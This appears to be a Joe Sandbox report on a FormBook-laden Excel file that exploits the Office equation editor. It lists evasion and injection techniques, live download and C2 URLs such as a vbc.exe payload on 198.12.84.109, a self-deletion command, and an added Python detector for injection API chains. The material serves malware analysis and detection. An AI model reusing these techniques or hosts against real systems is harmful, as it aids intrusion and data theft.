        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852Thread sleep time: -300000s >= -30000s
        Source: C:\Users\Public\vbc.exe TID: 3036Thread sleep time: -39025s >= -30000s
        Source: C:\Users\Public\vbc.exe TID: 2964Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\raserver.exe TID: 2012Thread sleep time: -32000s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 39025
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: explorer.exe, 00000008.00000000.491890159.000000000449C000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0P
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: VMWARE
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000008.00000000.539206634.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
        Source: explorer.exe, 00000008.00000000.492529993.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc
        Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A526F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF26F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B10 LdrLoadDll,
        Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeDomain query: www.corpmat.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
        Source: C:\Windows\explorer.exeNetwork Connect: 144.217.61.66 80
        Source: C:\Windows\explorer.exeDomain query: www.boxtobookshelf.com
        Source: C:\Windows\explorer.exeDomain query: www.hansel-design.com
        Source: C:\Windows\explorer.exeDomain query: www.aubergetoitrouge.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
        Source: C:\Windows\explorer.exeNetwork Connect: 75.2.89.208 80
        Source: C:\Windows\explorer.exeDomain query: www.afishin.com
        Sample uses process hollowing technique
        Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 7C0000
        Maps a DLL or memory area into another process
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Injects a PE file into a foreign process
        Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
        Queues an APC in another process (thread injection)
        Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
        Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1764
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmpBinary or memory string: !Progman
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
        Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
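The native API sequences recorded for raserver.exe at the top of this section (NtCreateSection, NtMapViewOfSection twice and NtUnmapViewOfSection inside one function; NtQueryInformationProcess, RtlWow64SuspendThread, NtSetContextThread, NtQueueApcThread and NtResumeThread inside another) are the concrete evidence behind the "Maps a DLL or memory area into another process", "Modifies the context of a thread in another process" and "Queues an APC in another process" signatures above. The following is an added example, not the sandbox's own matcher: it parses lines in the report's "pid_round_address api,api,..." layout and flags ordered sub-sequences inside a function as well as the per-process co-occurrence of hollowing primitives. The chain definitions and the two benign control lines are assumptions; the other trace lines are copied from this report.

```python
"""Native-API chain matching for the injection sequences this report lists.

Added example, not Joe Sandbox code. TRACE reproduces "Code function"
lines from the report in its "<pid>_<round>_<addr> api,api,..." layout;
the last two entries are constructed benign controls. Which orderings
count as a chain is an assumption encoded in CHAINS.
"""
import re
from collections import defaultdict

TRACE = [
    "9_2_0226632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,",
    "9_2_022667C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,",
    "9_2_02266332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,",
    "9_2_01EDFC90 NtUnmapViewOfSection,",
    "9_2_01EDFE24 NtWriteVirtualMemory,",
    "9_2_01EDFFFC NtCreateProcessEx,",
    "3_1_00401000 NtCreateFile,NtReadFile,NtClose,",             # constructed benign control
    "3_1_00401200 NtCreateSection,NtMapViewOfSection,NtClose,",  # constructed: a single mapping is ordinary
]

# Ordered sub-sequences that must appear within one function body.
CHAINS = {
    # section created and mapped twice (locally, then into the target): section-mapping injection
    "section_map_injection": ("NtCreateSection", "NtMapViewOfSection", "NtMapViewOfSection"),
    # overwrite a suspended thread's context, queue an APC, resume it: thread hijack + APC injection
    "thread_hijack_apc": ("NtSetContextThread", "NtQueueApcThread", "NtResumeThread"),
}

# Primitives whose co-occurrence anywhere in one process is the classic hollowing toolkit.
HOLLOWING_PRIMITIVES = {"NtCreateProcessEx", "NtUnmapViewOfSection", "NtWriteVirtualMemory",
                        "NtSetContextThread", "NtResumeThread"}

_LINE = re.compile(r"^(\d+)_(\d+)_([0-9A-Fa-f]+)\s+(.*)$")


def parse_trace(lines):
    """Return [(pid, addr, [api, ...]), ...] for each well-formed trace line."""
    out = []
    for line in lines:
        m = _LINE.match(line.strip())
        if not m:
            continue
        pid, _round, addr, rest = m.groups()
        out.append((pid, addr, [a for a in rest.split(",") if a]))
    return out


def is_subsequence(needle, hay):
    """True if needle's items occur in hay in that order (gaps allowed)."""
    it = iter(hay)
    return all(any(x == item for item in it) for x in needle)


def find_chains(entries):
    """(pid, addr, chain_name) for every function whose call list contains a chain."""
    return sorted((pid, addr, name)
                  for pid, addr, apis in entries
                  for name, chain in CHAINS.items()
                  if is_subsequence(chain, apis))


def hollowing_score(entries):
    """Per pid, how many distinct hollowing primitives appear anywhere in its trace."""
    seen = defaultdict(set)
    for pid, _addr, apis in entries:
        seen[pid].update(a for a in apis if a in HOLLOWING_PRIMITIVES)
    return {pid: len(s) for pid, s in seen.items()}


if __name__ == "__main__":
    entries = parse_trace(TRACE)
    for pid, addr, name in find_chains(entries):
        print(f"pid {pid} func {addr}: {name}")
    print("hollowing primitives per pid:", hollowing_score(entries))
```

Both raserver.exe functions match (the section pair twice, the thread hijack once) and pid 9 exhibits all five hollowing primitives, while the control process matches nothing. Matching inside a single function is what keeps the single-mapping control quiet: a lone NtCreateSection plus one NtMapViewOfSection is how every image load looks.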

        Stealing of Sensitive Information:

        Yara detected FormBook
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        Remote Access Functionality:

        Yara detected FormBook
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Techniques flagged for this sample, grouped by tactic (the cells that carry a hit badge in the full matrix; the badge number is kept in parentheses and the unflagged template cells are omitted):

        Initial Access: none flagged
        Execution: Shared Modules (1); Exploitation for Client Execution (13)
        Persistence: none flagged
        Privilege Escalation: Process Injection (612); Extra Window Memory Injection (1)
        Defense Evasion: Process Injection (612); Masquerading (111); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (31); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (13); Timestomp (1); Extra Window Memory Injection (1)
        Credential Access: none flagged
        Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (31); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (113)
        Lateral Movement: none flagged
        Collection: Archive Collected Data (11)
        Exfiltration: none flagged
        Command and Control: Encrypted Channel (1); Ingress Tool Transfer (12); Non-Application Layer Protocol (2); Application Layer Protocol (122)
        Network Effects, Remote Service Effects, Impact: none flagged

        Behavior Graph

        Behavior Graph ID: 483690
        Sample: (RFQ) No.109050.xlsx
        Start date: 15/09/2021
        Architecture: WINDOWS
        Score: 100

        Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures

        Process tree (indentation shows parent and child; "injected" marks a node entered by code injection rather than by process creation):

        EXCEL.EXE (started)
            dropped: C:\Users\user\...\~$(RFQ) No.109050.xlsx, data
        EQNEDT32.EXE (started)
            network: 198.12.84.109, 49165, 80, AS-COLOCROSSINGUS, United States
            dropped: C:\Users\user\AppData\Local\...\vbc[1].exe, PE32
            dropped: C:\Users\Public\vbc.exe, PE32
            signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            vbc.exe (started)
                signatures: Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign process
                vbc.exe (started)
                    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                    explorer.exe (injected)
                        network: aubergetoitrouge.com 144.217.61.66, 49166, 80, OVHFR, Canada
                        network: afishin.xshoppy.shop 75.2.89.208, 49168, 80, AMAZON-02US, United States
                        network: 7 other IPs or domains
                        signature: System process connects to network (likely due to code injection or exploit)
                        raserver.exe (started)
                            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                            cmd.exe (started)


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        (RFQ) No.109050.xlsx | 34% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

        Dropped Files

        Source | Detection | Scanner
        C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML

        Unpacked PE Files

        Source | Detection | Scanner | Label
        7.2.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

        Domains

        Source | Detection | Scanner
        boxtobookshelf.com | 1% | Virustotal
        corpmat.com | 0% | Virustotal

        URLs

        Source | Detection | Scanner | Label
        http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
        http://www.corpmat.com/r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 | 0% | Avira URL Cloud | safe
        http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
        http://treyresearch.net | 0% | URL Reputation | safe
        http://java.sun.com | 0% | Avira URL Cloud | safe
        http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
        http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 | 100% | Avira URL Cloud | malware
        http://www.boxtobookshelf.com/r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 | 0% | Avira URL Cloud | safe
        http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
        http://198.12.84.109/cmd/vbc.exe | 0% | Avira URL Cloud | safe
        www.afishin.com/r48a/ | 100% | Avira URL Cloud | malware
        http://www.%s.comPA | 0% | URL Reputation | safe
        http://www.aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 | 0% | Avira URL Cloud | safe
        http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
boxtobookshelf.com | 34.98.99.30 | true | false | | unknown
afishin.xshoppy.shop | 75.2.89.208 | true | true | | unknown
corpmat.com | 34.102.136.180 | true | false | | unknown
aubergetoitrouge.com | 144.217.61.66 | true | true | | unknown
www.hansel-design.com | unknown | unknown | true | | unknown
www.aubergetoitrouge.com | unknown | unknown | true | | unknown
www.corpmat.com | unknown | unknown | true | | unknown
www.afishin.com | unknown | unknown | true | | unknown
www.boxtobookshelf.com | unknown | unknown | true | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.corpmat.com/r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 | false | Avira URL Cloud: safe | unknown
http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 | true | Avira URL Cloud: malware | unknown
http://www.boxtobookshelf.com/r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 | false | Avira URL Cloud: safe | unknown
http://198.12.84.109/cmd/vbc.exe | true | Avira URL Cloud: safe | unknown
www.afishin.com/r48a/ | true | Avira URL Cloud: malware | low
http://www.aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp | false | | high
http://www.day.com/dam/1.0 | 45F1FF87.emf.0.dr | false | | high
http://investor.msn.com/ | explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000008.00000000.482845859.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.12.84.109 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
34.102.136.180 | corpmat.com | United States | 15169 | GOOGLEUS | false
34.98.99.30 | boxtobookshelf.com | United States | 15169 | GOOGLEUS | false
144.217.61.66 | aubergetoitrouge.com | Canada | 16276 | OVHFR | true
75.2.89.208 | afishin.xshoppy.shop | United States | 16509 | AMAZON-02US | true

                                              General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483690
Start date: 15.09.2021
Start time: 11:40:38
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 47s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: (RFQ) No.109050.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 11
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/19@5/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 6.3% (good quality ratio 6%)
• Quality average: 72.9%
• Quality standard deviation: 26.5%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
11:41:45 | API Interceptor | 64x Sleep call for process: EQNEDT32.EXE modified
11:41:48 | API Interceptor | 53x Sleep call for process: vbc.exe modified
11:42:12 | API Interceptor | 206x Sleep call for process: raserver.exe modified
11:43:06 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

Match | Associated Sample Name / URL | Detection | Context

198.12.84.109
• ORDER 5172020.xlsx (malicious): 198.12.84.109/avs/vbc.exe
• PO-80722 .xlsx (malicious): 198.12.84.109/av/vbc.exe
• ORDER 5172020.xlsx (malicious): 198.12.84.109/rever/vbc.exe
• PO 60078.xlsx (malicious): 198.12.84.109/http/vbc.exe
• Players profile-661735550.xlsx (malicious): 198.12.84.109/www/vbc.exe
• ORDER 922021.xlsx (malicious): 198.12.84.109/kews/vbc.exe
• Quotation request.xlsx (malicious): 198.12.84.109/wdcb/vbc.exe
• PO 446593.xlsx (malicious): 198.12.84.109/ping/vbc.exe
• RFQ 10305 .xlsx (malicious): 198.12.84.109/pnb/vbc.exe
• 19082021.xlsx (malicious): 198.12.84.109/hdfc/vbc.exe

144.217.61.66
• ORDER 5172020.xlsx (malicious): www.aubergetoitrouge.com/r48a/?-ZDhz=WvIXBnuXy4zpuni0&8pBh=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==
• ORDER 5172020.xlsx (malicious): www.aubergetoitrouge.com/r48a/?Br=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&nleTs=-Zy83VrHWfxhip

                                              Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                              ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):538624
                                              Entropy (8bit):7.1421525751651425
                                              Encrypted:false
                                              SSDEEP:12288:aWHCM2K4CXmePITM0KbDAa8p0MQRqPbPJ3jNWAYH+jbRX2t:23CXXPIQ0gvM9DxtYH+92
                                              MD5:A3F424F32B637CB917E6596FAE56E401
                                              SHA1:9FF12D1CFCA13F94EEDBEB016974ECAE44B56266
                                              SHA-256:32258A09DDCB62EA68D47261889D0E888723AFBAB1BC4A3F137EC2E3C0DC01D4
                                              SHA-512:F238DD5F32E4D862C19F40B5264F0093DD6BBA251DB6FF68FD42D9BE8331111661781DDAB85E0DE3FE4F9B6A919E15782855EE329FE8CCAFB3641523FF0BA0C5
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:http://198.12.84.109/cmd/vbc.exe
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\248940E8.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):49744
                                              Entropy (8bit):7.99056926749243
                                              Encrypted:true
